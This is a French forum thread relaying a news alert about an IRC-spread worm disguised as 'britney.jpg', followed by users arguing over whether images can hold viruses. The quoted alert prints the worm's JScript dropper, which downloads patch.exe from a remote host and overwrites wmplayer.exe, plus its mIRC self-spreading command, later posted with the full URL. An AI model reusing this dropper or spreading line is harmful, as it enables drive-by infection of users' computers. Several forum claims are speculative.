http://www.presence-pc.com/news/n1972.html
 
D'après cette news, faites attention à ce nouveau virus, qui n'est pas encore détecté par les anti-virus, et qui se propage par IRC via une nouvelle faille d'IE ...
 
 

Depuis hier, un nouveau vers très dangereux circule sur Internet: il se diffuse via le réseau IRC et se cache derrière une image au format JPEG nommée "britney.jpg" hébergée sur les serveurs de Angelfire et scavenger.sharewith.us.  
 
Ce vers exploite une faille de sécurité présente dans le navigateur Microsoft Internet Explorer ainsi que dans le lecteur Windows Media Player (documentée ici). Lorsque qu'un lien contenant le fichier "britney.jpg" est ouvert, ce petit bout de code se charge de télécharger un fichier .exe responsable du désordre qui règnera alors sur votre ordinateur:  
-----  
var x = new ActiveXObject("Microsoft.XMLHTTP" );  
x.Open("GET", "http://***********.us/patch.exe",0);  
x.Send();  
var s = new ActiveXObject("ADODB.Stream" );  
s.Mode = 3;  
s.Type = 1;  
s.Open();  
s.Write(x.responseBody);  
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);  
location.href = "mms://";  
-----  
 
Le programme patch.exe est compressé avec l'utilitaire de compression d'exécutables nommé UPX. Lorsque l'on analyse son contenu après décompression, on peut trouver la commande:  
/.amsg http://www.angelfire.com/*****/*****/britney.jpg <- uuh, check it out !!  
 
Si le logiciel mIRC est lancé, alors un message contenant l'url infectée sera envoyé sur tous les salons de discussion sur lesquels vous êtes présent.  
 
Ce fichier exécutable contient également une listes de fichiers systèmes tels ntoskrnl.exe, userinit.exe, services.exe, ainsi qu'une liste de fichiers exécutables correspondant à divers logiciels anti-virus et firewalls. Cette liste permet au vers de désactiver les logiciels de protection en question pour ensuite pouvoir remplacer/effacer les fichiers systèmes Windows et altérer le contenu de la base de registre. Si le service de protection des fichiers systèmes est activé, Windows détectera toutes ces modifications et vous proposera de redémarrer votre machine pour qu'il puisse procéder à une restauration des fichiers concernés.  
 
Passé ce stade, vous pouvez considérer votre Windows comme perdu à tout jamais: tenter de réparer l'installation de Windows ou de restaurer les fichiers endommagés ne sera pas suffisant pour récupérer le système. Comme le vers aura altéré la base de registres, une réinstallation complète sera nécessaire.  
 
Pour le moment, le virus ne s'attaquerait pas à Windows 98 mais il s'attaque de manière certaine au moins à Windows 2000 et Windows XP. Les logiciels anti-virus dans leur version actuelle ne vous seront d'aucune utilité puisque le virus n'est pas encore connu: surtout ne pas confondre ce nouveau vers avec le vers mIRC nommé "britny" dont vous pourrez trouver la description ici  
 
Le site scavenger.sharewith.us auraît déjà pris les mesures nécessaires pour empêcher la diffusion du virus, mais la page du site Angelfire est encore active. En conséquence, ne cliquez pas sur un lien du type http://www.angelfire.com/***/***.jpg.
 
 
 
 
Edit : J'ai viré les liens figurant dans ce post ...

une image NE PEUT PAS contenir de virus... Elle peut seulement activer un virus déjà installer.... Il faut arreter les légendes urbaine Mrpochpoch....

 
ce n'est pas moi qui le dit ... c'est d'ailleurs la raison pour laquelle j'ai mis le texte en italique ...
 
Ce n'est pas l'image qui est verollée, mais le fait de cliquer sur le lien contenant le nom de cette image permet apparemment à un bout de code de s'éxécuter et d'infecter le PC ...
 
Maintenant, je ne suis pas spécialiste en virus et anti-virus ... je poste juste ici pour donner cette information trouvée ailleurs, sur un site qui me semble etre sérieux dans ses infos ...
 
Et si cette info ne te semble pas intéressante, passe ton chemin ...    
 
 

 
   
déjà vu passer qquechose comme ca pourtant... un .jpg qui contenait avant l'image du code vbscript. Il faisait ouvrir le lecteur cd du pc !

/.amsg http://www.angelfire.com/celeb2/picsx/britney.jpg <- uuh, check it out !!  
 
marche pas l'url.

 
C'était pas une image.
Juste un script avec extension .jpg, mais ça n'en fait pas une image
Et comme sur le web l'action dépend du "content-type" envoyé par le serveur et non de l'extension, si on dit au browser que c'est un script il l'exécute.
Et dans ce cas-ci le script exploite une faille de sécu de IE (et uniquement IE )

 
si justement, yavait le script, et une image

non:
il y avait une page web contenant un script et un lien <img src="..."> qui lui affichait une image.
Donc l'url ne pointait pas directement vers une image

on est ptêt tombés sur 2 images différentes
 
mais je t'assure qu'il y avait le script et l'image dans le même fichier !

pas possible
Tu voyais quoi en faisant view source sur l'image ? Du code HTML+VBS, non ?

Je t'assure que si pourtant. Enfin crois-moi pas, tant pis pour toi
 
edit: j'ai pas le fichier en question sous la main, je pourrai poster le lien ce soir, il est sur mon pc chez moi
 
edit2: j'ai comme un gros doute tout à coup, sur le html+vbs

 
bah oui, poste-le, parce que je serais curieux... à moins qu'en plus de la faille bien connue avec le VBS IE ait une faille avec les images, je ne vois pas comment ça pourrait marcher

 
apparemment, c'est normal, et tant mieux !! l'hébergeur a du faire quelque chose pour empecher l'accès à ce type de contenu ...
 
Enfin, bon ... ça commence à faire bien chier toutes ces failles de sécu sur IE ... et sur Media-player aussi maintenant !!!    
 
vive opera !  

 
exacte vue que t'aime l'humour debile en voici.
 
http://www.lemonde.fr/web/recherch [...] 358,0.html  
 
comme tu l'aimes.

je vois pas le rapport

spas nouveau les failles sur le Media Player de windows

 
bah c'est F18 ...

 
ce matin j'ai recu 4 fichiers probablement infecté que norton n'a pas pu identifier car c'etait 3 en EXE et 1 en PIF j'ai detruit sans ouvrir.
 
tous les emails provenais de boites emails allemandes car l'extension est De hors l'identitie d'un pays finissant par DE sont pas la France.

Formidable... je ne vois toujours pas ce que ça vient faire dans l'histoire

moi ce matin j'ai recu un email de tawain ! vous vous rendez compte? ;-)

Même chose ici, ce n'est pas une image, en fait.
 
http://www.danasoft.com/sig-fre.jpg
 

 
explications ici :
 
http://forum.pcastuces.com/sujet.asp?SUJET_ID=29171

Heu si, ici c'est une image justement.
Le serveur exécute un script qui renvoie une image "personnalisée" (sur le serveur il s'agit bien d'un script) : le client il n'a qu'une image et elle n'a rien de différent par rapport à n'importe quelle autre image techniquement (alors que pour le virus le client reçoit un script).

 
justement si :
 
il signale que qu'un nouveau virus passe par irc et lors que les societés d'antivirus vont les testes ils constatent que les virus passent aussi bien par IRC que par email.
 

j ai peur  

 
Et qui dit que c'est le même virus ? Et pourquoi tu racontes cette histoire de .DE dont on se fout ?

 
 
t'as de la chance que j'ai pas ton email sinon je te l'aurais envoyé comme preuve.  
 
le fichier joint fait 35KO
 

 
Pour prouver quoi ? Que c'est le même virus que celui dont il est question dans le topic ? Si tu l'as viré sans regarder comment tu peux savoir que c'est ça ?

bien flippant le lien du monde
 
Chuis bien content d'etre un nerd linuxien ca devrait me permettre d'eviter ce genre de choses

 
voici le virus que j'ai du recevoir car je reconnais le nom de la piece jointe.
 
http://www.secuser.com/alertes/2003/sober.htm
 
cm-recover.com
 
il figure dans la liste des noms de pieces jointes.

Bon, ben je crois bien avoir chopper ce virus vu que mon media player a plein de parasites et mon curseur aussi...
 
J'avais le patch.exe dans mon gestionnaires de tache et services.exe, comme c'est écrit dans l'article
 
Tout ça smellt le virus et pourtant, j'ai pas vu ce britney.jpg !!!
 
En tout cas, j'ai plus qu'à formater moi

 
 
y en as qui croit encore au pere noel

crée une page html appelle la .jpg ouvre la sous mozilla et tu verra le code ouvre la sous IE et tu verra une page HTML ...

 
Il a raison, une image ne peut pas contenir de virus... par contre comme je l'ai dit sur le web l'extension ne définit pas le contenu ni le traitement à effectuer.
Bon ici c'est un bug d'IE : Que ce fichier s'appelle .vbs ou .jpg ça revient au même : IE voit qu'il y a un script dedans du coup il l'exécute, alors que ça devrait dépendre des infos qu'envoie le serveur. Il n'y a que IE qui fait des conneries de ce genre

oui mais dans son resonnement il dit qu'un vraie jpeg peu executer un autre script qui est deja sur le PC ...

S'il y a déjà un virus dans le PC il peut très bien réagir au moment où l'image est lue, je suppose que c'est ça qu'il voulait dire

au moment ou limage est lu ? je comprend pas soit c'est le virus qui dit if open briney.jpg exec gngngngn.vbs mais dans tout les cas c'est n est pas l image qui peu dire when open exec cgngngn.vbs ??? je me trompe ?

Y'a bien eu un virus (linux pour une fois ) qui utilisait un mp3 volontairement mal formé qui lu avec un lecteur en particulier permettait de lancer une commande shell deletant le contenu du repertoire home de l'user : http://securityresponse.symantec.c [...] bellz.html

Infected

je sais pas si ca a un raport mais avp ma troové ca la
 
trojan.win32.fakesvc.c  ds windows/system32/winsta.dll

Alors dans l'ordre ca aniker
 
Ntoskrnl.exe  
System
System.sav
 
et plein d'autre jimagine
 
xaT